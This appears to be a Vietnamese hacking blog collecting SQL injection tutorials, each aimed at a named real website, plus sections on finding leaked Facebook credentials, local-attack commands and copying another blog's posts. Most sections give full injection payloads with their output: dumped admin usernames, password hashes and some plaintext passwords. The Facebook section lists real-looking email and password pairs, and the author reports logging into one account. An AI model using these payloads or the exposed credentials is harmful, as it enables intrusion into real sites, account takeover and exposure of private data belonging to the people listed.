tut 406

b1:http://www.royalstone.com.vn/?do=products&act=detail&id=-83 UNION SELECT 1,2,3,4,5,6--
kết qua ra:

Not Acceptable

An appropriate representation of the requested resource / could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. là ta bít lỗi 406
b2:http://www.royalstone.com.vn/?do=products&act=detail&id=-83 /*!UNION SELECT*/ 1,2,3,4,5,6--
ra:

Code  :   6
Name :  3

Price  :   Contact
Description : 4 

b3:http://www.royalstone.com.vn/?do=products&act=detail&id=-83 /*!UNION SELECT*/ 1,2,3,version(),5,6--

ra:Code  :   6 

Name :  3

Price  :   Contact
Description : 5.1.70-cll

b4:http://www.royalstone.com.vn/?do=products&act=detail&id=-83 /*!UNION SELECT*/ 1,2,3,group_concat(/*!table_name*/),5,6 from information_schema.tables where /*!table_schema*/=database()--

ra:tt_admin,tt_flash,tt_gallery,tt_gallery2,tt_info1,tt_introduction,tt_links,tt_partners,tt_products,tt_services 

b5:http://www.royalstone.com.vn/?do=products&act=detail&id=-83 /*!UNION SELECT*/ 1,2,3,group_concat(/*!column_name*/),5,6 from information_schema.columns where /*!table_schema*/=database()--

ra:id,username,password,email,right,id,title_vn,mwidth,mheight,active,porder,img,id,cid,title_vn,title_en,porder,img,date,showhome,id,cid,title_vn,title_en,porder,img,date,showhome,id,title_vn,title_en,content_vn,content_en,email,img,porder,id,title_vn,title_en,content_vn,content_en,porder,desc_vn,desc_en,img,id,name_vn,name_en,link_vn,link_en,oder,id,title_vn,e,porder,id,cid,title_vn,content_vn,keysearch,price,new,porder,img,date,title_en,content_en,code,desc_vn,desc_en,id,title_vn,title_en,content_vn,content_en,porder,desc_vn,desc_en,img

b6: http://www.royalstone.com.vn/?do=products&act=detail&id=-83 /*!UNION SELECT*/ 1,2,3,group_concat(username,0x2f,password),5,6 from tt_admin--

ra:

Code  :   6
Name :  3

Price  :   Contact
Description : hoanggia/a04b0c2595c18a1a3a9fa232601d14d8 

Read More..

tut ko có use và admin

B1:TIM VITIM http://www.pushingpetals.com/buy.php?id=-55
B2:http://www.pushingpetals.com/buy.php?id=-55
B3:http://www.pushingpetals.com/buy.php?id=55 ORDER BY 13--
L?I
B4:http://www.pushingpetals.com/buy.php?id=-55 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12--

2

Description: 3

B5:http://www.pushingpetals.com/buy.php?id=-55 UNION SELECT 1,2,unhex(hex(group_concat(TABLE_name))),4,5,6,7,8,9,10,11,12 from information_schema.TABLEs where table_schema=database()--
RA:Description:
creb conference,customer,localpushingpetalsorders,members,pushingpetals,pushingpetalsorders,user 
B6:http://www.pushingpetals.com/buy.php?id=-55 UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12 from information_schema.columns where table_schema=database()--
 KO RA ADMIN,nhưng có USER TA B?T BU?C TÌM MEMBER

2

Description: ticket,first name,last name,phone,email,company,website,registration id,twitter,cust_id,name,address,id,name,description,small,medium,large,smallimg,largeimg,type,other,other2,other3,id,username,password,id,firstName,lastName,cellNumber,workNumber,emailHome,emailWork,relationshipStatus,spousesFirstName,homeAddress,workAddress,specialAddress,prefferedMethodOfContactPhoneWork,prefferedMethodOfContactPhoneHome,prefferedMethodOfContactEmailHome,prefferedMethodOfContactEmailWork,prefferedMethodOfContactOther,anythingElse,spouseIs,password,passwordConfirm,passwordNew,loginNew,id,name,description,small,medium,large,smallimg,largeimg,type,other,other2,other3,id,name,Last,ticket#

B7:http://www.pushingpetals.com/buy.php?id=-55 UNION SELECT 1,2,unhex(hex(group_concat(username,password))),4,5,6,7,8,9,10,11,12 from members
--
ra kết quả:

2

Description: john1234,Jacob123

Read More..

tut check sql sài lệnh mid 100,1000(sql nang cao)

B1:http://sodephagiang.com/index.php?option=com_simcategories&view=simcategories&id=6'
bị lỗi rùi
b2:http://sodephagiang.com/index.php?option=com_simcategories&view=simcategories&id=6
kiểm tra order by 1--dế9n khi lỗi  (lỗi 7)
b3:http://sodephagiang.com/index.php?option=com_simcategories&view=simcategories&id=6' UNION SELECT 1,2,3,4,5,6-- -
ở đây mình thêm id=-6' để cho dễ nhìn chư ' cũng ra
ra kết quả:

Tổng cộng có 1 sim

STT	Số sim	Nhà cung cấp	Giá bán	Mua
1	2	5	3.000 4

b4:http://sodephagiang.com/index.php?option=com_simcategories&view=simcategories&id=6' UNION SELECT 1,version(),3,4,5,6-- -
ra :

 Tổng cộng có 1 sim

STT	Số sim	Nhà cung cấp	Giá bán	Mua
1	5.5.34	5	3.000 4

b6:http://sodephagiang.com/index.php?option=com_simcategories&view=simcategories&id=-6' UNION SELECT 1,mid(group_concat(table_name),100,5000),3,4,5,6 from information_schema.tables where table_schema=database()-- -
ra:STT S? sim Nhà cung c?p Giá bán Mua

	Nhà cung cấp	Giá bán	Mua
1	ontent,tvn_content_frontpage,tvn_content_rating,tvn_core_acl_aro,tvn_core_acl_aro_groups,tvn_core_acl_aro_map,tvn_core_acl_aro_sections,tvn_core_acl_groups_aro_map,tvn_core_log_items,tvn_core_log_searches,tvn_groups,tvn_menu,tvn_menu_types,tvn_messages,tvn_messages_cfg,tvn_migration_backlinks,tvn_modules,tvn_modules_menu,tvn_newsfeeds,tvn_phocaguestbook_books,tvn_phocaguestbook_items,tvn_plugins,tvn_poll_data,tvn_poll_date,tvn_poll_menu,tvn_polls,tvn_sections,tvn_session,tvn_sim,tvn_sim_admin,tvn_sim_categories,tvn_sim_order,tvn_sim_provider,tvn_sim_scroll,tvn_stats_agents,tvn_templates_menu,tvn_users,tvn_vvcounter_logs,tvn_vvisitcounter,tvn_weblinks,tvn_wf_profiles	5	3.000 4

b7:http://sodephagiang.com/index.php?option=com_simcategories&view=simcategories&id=-6' UNION SELECT 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=0x74766e5f7573657273-- -
ra:

Số sim	Nhà cung cấp	Giá bán	Mua
1	id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params	5

.
b8:http://sodephagiang.com/index.php?option=com_simcategories&view=simcategories&id=-6' UNION SELECT 1,group_concat(username,0x7c,password),3,4,5,6 from tvn_users-- -
ra:S? sim Nhà cung c?p Giá bán Mua

Số sim	Nhà cung cấp	Giá bán	Mua
1	Mạnh Tiến|f383f8ec5dfb9d2e8804ce5fa54faef4:K3g7nDcYn3Doj1ZvE1lM9Tm83iCY8Uhn,stkienhien|60035490627c6cda0c77bfdac40f9f26:gzBzPdi5yxSGoRGrgzPfvVcQZAlU6ROF

Read More..

tut xpath (sql nang cao)

b1:Get version(), database(), user():
http://coex.com.vn/?option=hotro&catId=121 and updatexml(0,concat(0x7c,version(),0x7c,database(), 0x7c,user()),0)-- -
ra kết quả:
XPATH syntax error: '|5.6.13-log|admin_coex|coex@loca'
b2:Get Table:

http://coex.com.vn/?option=hotro&catId=121 and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -

Tang Limit lên d?n d? get table c?n tìm.
==> admin, admin_rights, admintype
b3:Get Column:

http://coex.com.vn/?option=hotro&catId=121 and updatexml(0,concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns WHERE table_name=0x61646d696e limit 0,1)),0)--

Tang Limit lên d?n d? get column c?n tìm.
==> id, idtype, firstname, astname, email, password, status

b4:Get tài kho?n:

http://coex.com.vn/?option=hotro&catId=121 and updatexml(0,concat(0x7c,(select concat(email,0x7c,password) from admin limit 0,1)),0)-- -

------------------------------------------
ID: admin
Pass: mediamart

ID: cuonglv
Pass: levancuong

Link login: http://coex.com.vn/login.php

Read More..

tut thêm =-1148952776'

b1:http://hamu.com.cn/webpage/product_detail.php?id=1148952776
ta thường dấu ' hoac - nhưng dạng này nó ko chịu.kiểu này khó đây,ta thử thêm - và ' xem sao lỗi rùi
b2:http://hamu.com.cn/webpage/product_detail.php?id=-1148952776'
ra kết quả:
Database error: Invalid SQL: SELECT * FROM webmagic_info WHERE info_id='-1148952776''
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1148952776''' at line 1)
Session halted.
b3:http://hamu.com.cn/webpage/product_detail.php?id=-1148952776' union select 1,2,3,4,unhex(hex(group_concat(column_name))),6,7,8,9,10,11,12,13 from information_schema.columns where table_schema=database()-- -

ra kết quả:

ProductID: 2

Description: account_id,account_name,account_pwd,account_dept,account_lastlogin,account_lastloginfrom,account_type,account_status,account_lastpwd

b4:http://hamu.com.cn/webpage/product_detail.php?id=-1148952776' UNION SELECT 1,2,3,4,unhex(hex(group_concat(column_name))),6,7,8,9,10,11,12,13 from information_schema.columns where table_schema=database() and table_name=0x7765626d616769635f75736572-- -

ra kết quả:

ProductID: 2

Description: id,username,password

b5:http://hamu.com.cn/webpage/product_detail.php?id=-1148952776' UNION SELECT 1,2,3,4,unhex(hex(group_concat(username,0x2f,password))),6,7,8,9,10,11,12,13 from webmagic_user-- -

ra kết quả:

ProductID: 2

Description: admin/admin

Read More..

tut SQL injection dạng HTML

htxp://nguyensashop.com mà lần trước mình có nói là nó thuộc dạng html cùi bắp, và site này được cung cấp từ htxp://bygpages.vn/
và theo mình tìm hiểu thi hầu như thì các site đuọc cung cấp từ trang htxp://bygpages.vn/ đều dính lỗi Sql injection, ví dụ như htxp://www.cameralevu.com/, htxp://www.maychieuchothue.com/ . . . 
các bạn có thể thử đối với những site này
sau đây thì mình cũng xin hương dẫn sơ qua chút cho các bạn newbie như mình học hỏi 

- victim: htxp://www.maychieuchothue.com/

__đầu tiên xác định lỗi: thêm ( ' ) vào trước ( .html ) và dấu ( - ) vào trước chữ ( may )
=> ta được: http://www.maychieuchothue.com/ho-tro-ky...diem'.html

=> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-may-chieu-cong-nghe-lcd-va-dlp-uu-nhuoc-diem''' at line 3

__ xác định sô số column: http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' order by 3-- -.html

* chú ý: không có cái này không được nhé ( -- - ) 
=> Unknown column '3' in 'order clause'
http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' order by 2-- -.html
=>> không lỗi, vậy nó có 2 column
chỉ có 2 column thôi nên bỏ qua bước xem nó lỗi ở table nào nhé ! ở đây nó lỗi ở số 2

___xác định verseion: http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' union select 1,version()-- -.html

=> ta đc: 5.5.8
__tiếp theo mình sẽ get table:
http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()-- -.html

=> ta được: chungtoi,gioithieu,hotro,loaisb,loaisp,sanpham,sidebar,user,yahoo 

tới đây mình tập trung vào table: user

__ get column từ table user:
http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x75736572-- -.html

***: 75736572 đây chữ user sau khi chuyển sang dạng hex, bắt buộc phải làm cái này !

=> ta được 1 đóng như thê này: 
id,name,username,password,thuTu,id,name,username,password,thuTu,username,password,username,password,userid,usergroupid,membergroupids,displaygroupid,username,password,passworddate,email,styleid,parentemail,homepage,icq,aim,yahoo,msn,skype,showvbcode,showbirthday,usertitle,customtitle,joindate,daysprune,lastvisit,lastactivity,lastpost,lastpostid,posts,reputation,reputationlevelid,timezoneoffset,pmpopup,avatarid,avatarrevision,profilepicrevision,sigpicrevision,options,birthday,birthday_search,maxposts,startofweek,ipaddress,referrerid,languageid,emailstamp,threadedmode,autosubscribe,pmtotal,pmunread,salt,ipoints,infractions,warnings,infractiongroupids,infractiongroupid,adminoptions,profilevisits,friendcount,friendreqcount,vmunreadcount,vmmoderatedcount,socgroupinvitecount,socgroupreqcount,pcunreadcount,pcmoderatedcount,gmmoderatedcount,assetposthash,fbuserid,fbjoindate,fbname,logintype,fbaccesstoken,newrepcount,post_thanks_user_amount,post_thanks_thanked_posts,post_thanks_thanked_times,topxtab,topxmenu,topxresul



- các bạn đừng có hoa mắt, chúng ta chỉ tập trung vào: username và password thôi, mấy cái kìa get cũng chỉ đc cái thông báo "not found" chứ chẳng có gì đâu

___ get data: 
http://www.maychieuchothue.com/ho-tro-ky...huoc-diem' union select 1,group_concat(username,0x7c,password) from user-- -.html

=> ta được: admin|d9e0c8391e50ab616cd531b5bcb95c7e 

việc còn lại là tìm cpanel của admin và crack password, ở đây password này mình không crack được, ai crack đuọc thì crack nhé 

tới đây hết nhé, có gì không đúng các bác đóng góp ý kiến nhé, mình cũng newbie thôi
_______End TuT_______

Read More..

Một số cách kiếm acc facebook

Bước 1: vào site google.com
Bước 2: Dùng 1 số dork
dork1: intext:charset_test= email= default_persistent=
dork2: inurl:"passes" OR inurl:"passwords" OR inurl:"credentials" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff
Ta nhận đc




Vào thì ta nhận đc 1 số danh sách như sau
http://www.esperanta.net/m/fb.txt


Vào thì ta nhận đc 1 số danh sách như sau
http://www.esperanta.net/m/fb.txt


lsd=AVqYDWg_
email=badbadz.guyz@gmail.com
pass=j300385m
default_persistent=0
charset_test=€,´,€,´,æ°´,Đ�� �,Đ„
timezone=-390
lgnrnd=063413_n5SH
lgnjs=1346678042
locale=en_US

hack=Hacker
email=lumbansitumeang@yahoo.co.id
pass=ijukDiparaparaLHS
default_persistent=0
charset_test=€,´,€,´,æ°´,Đ�� �,Đ„
timezone=
ip=
lgnjs=1346744311
locale=id_ID

hack=Hacker
email=aldhyfirmansah@yahoo.co.id
pass=woy089627622154
default_persistent=0
charset_test=€,´,€,´,æ°´,Đ�� �,Đ„
timezone=
ip=
lgnjs=1346757884
locale=id_ID

lsd=AVqYDWg_
email=josaronaldi@ymail.com
pass=ragelcantik
default_persistent=0
charset_test=€,´,€,´,æ°´,Đ�� �,Đ„
timezone=-360
lgnrnd=063413_n5SH
lgnjs=1346762452
locale=en_US
............
thử vào 1 thằng nhá 
email=badbadz.guyz@gmail.com
pass=j300385m
thấy oke :v

Cách 2:
Vào trang http://pastebin.com/
tìm khung search bar và nhập vào
Program:firefox Url/Host:http://www.facebook.com login 
hoặc
Program:firefox Url/Host:http://www.yahoo.com login 

tùy cái cần tìm mà nhập nhá 

vì dụ với Program:firefox Url/Host:http://www.facebook.com login
ta nhận đc là 


Chọn vào 1 link ta check thử đc
PHP Code:

PHP:

Program:        Firefox
Url/Host:      http://www.facebook.com
Login:          eleazarberrios@hotamail.com
Password:      eleazarberrios
Computer:      PC-3F2D90D21838
Date:          2010-12-30 23:51:12
Ip:                    200.82.253.174
----------------------------------------------------------
Program:        Firefox
Url/Host:      http://hacking-facebook.com
Login:          ele1234
Password:      eleazarberriosw
Computer:      PC-3F2D90D21838
Date:          2010-12-30 23:51:17
Ip:                    200.82.253.174
----------------------------------------------------------
Program:        Firefox
Url/Host:      http://www.facebook.com
Login:          eleazarberrios@hotmail.com
Password:      eleazarberrios
Computer:      PC-3F2D90D21838
Date:          2010-12-30 23:51:18
Ip:                    200.82.253.174
----------------------------------------------------------
Program:        Firefox
Url/Host:      https://login.facebook.com
Login:          eleazarberrios@hotmail.com
Password:      eleazarberrios
Computer:      PC-3F2D90D21838
Date:          2010-12-30 23:51:19
Ip:                    200.82.253.174
----------------------------------------------------------

Read More..

Hướng dẫn cách lấy toàn bộ bài viết từ blog khác

Hôm nay share123.vn sẽ hướng dẫn các bạn cách lấy data từ blog khác, hay nói cách khác là lấy bài viết từ blog khác về làm bài viết của blog mình. Nói là lấy data cho văn vẻ chứ thực ra đây là  một hình thức ăn cắp hay hack data của người khác về làm của mình. Tuy nhiên để làm được điều kiện này thì phải thỏa mãn một số điều kiện.

Điều kiện để hack data từ blog khác là blog đó phải để Cho phép nguồn cấp dữ liệu blog ở dạng Đầy đủ thì mới hack data theo cách này được.
Hình Minh họa

Đầu tiên các bạn cần  kiểm tra xem blog mà các bạn cần lấy có bao nhiêu bài viết để nhập thông số cho hợp lý bằng cách nhập đoạn mã sau vào công cụ kiểm tra

Đoạn mã code:
<script style="text/javascript">
function showpostcount(json) {
document.write('<center>Tổng số bài: <b>' + parseInt(json.feed.openSearch$totalResults.$t,10)
+ '</b></center>');}</script>
<script src="http://luubuttuoixanh.com/feeds/posts/default?alt=json-in-script&callback=showpostcount"></script>
<script style="text/javascript"></script>
Copy đoạn mã trên và nhập vào bảng kiểm tra html : Tại đây

Các bạn hãy nhớ là bao nhiêu bài viết nhé để phục vụ cho bước sau.
Bây giờ chúng ta bắt đầu lấy data  bằng cách vào link sau :

http://diachi.blogspot.com/atom.xml?redirect=false&start-index=m&max-results=n

Trong đó bạn thay các thông số như sau:

• start-index=m bắt đầu bài đăng mới nhất
• max-result=n lấy n bài, bắt đầu từ bài từ bài thứ m
• diachi.blogspot.com: là blog cần lấy Data

Ví dụ: Bạn muốn lấy bài từ 1 blog bất kỳ, ví dụ ở đây tôi muốn lấy 100 bài đầu tiên từ luubuttuoixanh.com thì tôi sẽ nhập link như sau:
http://www.luubuttuoixanh.com/atom.xml?redirect=false&start-index=1&max-results=100

Nếu muốn lấy thêm 100 bài nữa thì bạn chỉ việc thay chỉ số cho phù hợp như sau:

http://www.luubuttuoixanh.com/atom.xml?redirect=false&start-index=101&max-results=200

Sau đó bạn copy link này và bật IDM lên rồi nhấn vào Add URL của IDM paste link vào đó và download về máy dạng atom.xml

Lưu ý: Mỗi lần bạn lấy nên lấy tối đa tầm 400 bài là cùng thôi. và khi  bạn Nhập blog

Bây giờ bắt đầu cài đặt những bài đăng vừa lấy của blog khác lên Blog của mình

Đăng nhập vào bloger => Cài đặt => Khác => Nhập Blog =>Import bài lên => kết quả.

Khi import xong nên đăng lấy lệ 1 vài bài để xóa bỏ capchar khi import quá nhiều bài 1 lúc, google săm soi blog sẽ cho là spam sẽ disable acc.

Hướng dẫn cách Bảo mật data blogspot:

Để tránh bị mất, bị hack data thì các bạn nên làm như sau: Đăng nhập Bloger => Cài đặt =>Khác => Cho phép nguồn cấp dữ liệu blog => chọn Cho đến dấu ngắt

Hình minh họa

Khi đăng bài các bạn nhớ dùng biểu tương  Cho đến dấu ngắt nhé ( trong bài viết của bạn, chỗ nào bắt đầu đến chỗ quan trọng không cho người ta lấy bài thì nhấn vào biểu tượng 

Chúc bạn thành công

Nguồn: Share123.vn (Tổng hợp internet) 

Read More..

các lệnh local

++Khai thác SQL Blind :
http://ceh.vn/@4rum/showthread.php?tid=1203

++less /etc/passwd
less =cat =more.

Bộ shell : http://www.mediafire.com/download/c42t1hz2954928v/shell.rar
Tìm link adm site 
http://root.vn/threads/admin-finder-phan-mem-tim-link-admin-hieu-qua.3400/

++++++++++++++++++Tut LOCAL ATTACK:
http://www.mediafire.com/folder/8lya2k7axwi2y/tutorial
--------------------------LOCAL ATTACK------------------------------
+++++Tài liệu hướng dẫn Local Attack :http://ceh.vn/@4rum/showthread.php?tid=3031
+++Lệnh view user đối vs Direc admin :
*cd /etc~~~>cat passwd
*less /etc/virtual/domainowners
+++Lệnh view config sever Joomla :
*less /user/domains/victim.com/public_html/configuration.php (Tùy Path)
+++Cú Pháp SSI SHELL :
Ip/~user/path (Sau public_html)
--------------Pass MD5+SALT:
"1ead0efb9e47a371c301afbea8f57274:HmkI9oJSb8qdKzTXwfzJjdKwLSbUZDnZ" = 123456

Read More..

Khai thác Error Based - Quick Blind

Victim:

Mã:

http://haiduong.edu.vn/haiduongedu/v...t=1724&ID=1053'

Mã:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Quote:

- Lệnh get Database, User, Version: Mã: /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)*/-- - Lệnh get Table: Mã: /*!And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),1,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)*/-- - Lệnh get Column: Mã: /*!And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name),1,145) FROM information_schema.columns where table_schema=database() and table_name=xxxxxxxxxxxxxx) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)*/-- - Lệnh get Data: Mã: /*!And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(xxx,0x7c,xxx),1,145) FROM cdb_activities) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)*/--

Trên đây là các câu lệnh cần dùng để hack kiểu Quick Blind

Bắt đầu attack haiduong.edu.vn

Mã:

http://haiduong.edu.vn/haiduongedu/vn/portal/InfoDetail.jsp?area=1&cat=1724&ID=1053 /*!And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select  Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR  (124))x From Information_Schema.Tables Group By x)a)*/--

Hiện lỗi:

Mã:

Duplicate entry '|5.5.10|haiduongedu|root@localhost1|' for key 'group_key'

Vậy ta đã có Version, Database, User của site haiduong.edu.vn

Tiếp theo ta sẽ khai thác tiếp tất cả Table của site này. 

Mã:

http://haiduong.edu.vn/haiduongedu/vn/portal/InfoDetail.jsp?area=1&cat=1724&ID=1053 /*!And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(table_name),1,145) FROM information_schema.tables  where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM  Information_Schema.Tables Group By x)a)*/--

Mã:

Duplicate entry '|advertise,area,attach,attachtopic,banner,category,category4area' for key 'group_key'

Để lấy các table tiếp theo ta tăng giá trị 1 lên 50

Mã:

....substr(Group_concat(table_name),1,145....

Mã:

....substr(Group_concat(table_name),50,145....

Mã:

Duplicate entry '|,category4area,categoryarea,categorylinks,categorylu,forum,foru' for key 'group_key'

Cứ thế tăng lên 50 thành 100, 100 thành 150, 150 thành 200 (Có nghĩa là +50)

Đối với site haiduong.edu.vn là 450

Mã:

Duplicate entry '|gory,udata_field,udata_table,users,users_right,written1|' for key 'group_key'

Ta chú ý dấu | đó là dấu kết thúc, vậy table cuối cùng của site haiduong.edu.vn là "written1"

Tiếp tục lấy column của table user

Mã:

http://haiduong.edu.vn/haiduongedu/vn/portal/InfoDetail.jsp?area=1&cat=1724&ID=1053 /*!And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(column_name),1,145) FROM information_schema.columns  where table_schema=database() and table_name=CHAR(117, 115, 101, 114, 115))  ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By  x)a)*/--

Mã:

Duplicate entry '|ID,UserName,FullName,Password,Enabled,BirthDay,Address,Duty,Roo' for key 'group_key'

Mình đổi chuỗi users thành dạng CHAR(117, 115, 101, 114, 115).

Các bạn cũng đổi về dạng HEX cũng đc 0x7573657273

Muốn khai thác các column tiếp theo các bạn áp dụng theo cách lấy table là tăng giá trị 1 lên 50....100...150...

Mình sẽ lấy 2 column UserName và Password:

Mã:

http://haiduong.edu.vn/haiduongedu/vn/portal/InfoDetail.jsp?area=1&cat=1724&ID=1053 /*!And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select  substr(Group_concat(UserName,0x7c,Password),1,145) FROM users)  ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By  x)a)*/--

Mã:

Duplicate entry '|nguyenvanquoc|bac6347999e3703d55c949ff20285869,hoangvandoat|48b' for key 'group_key'

Lấy các giá trị tiếp theo ta lại tăng 1 lên nhé.

Read More..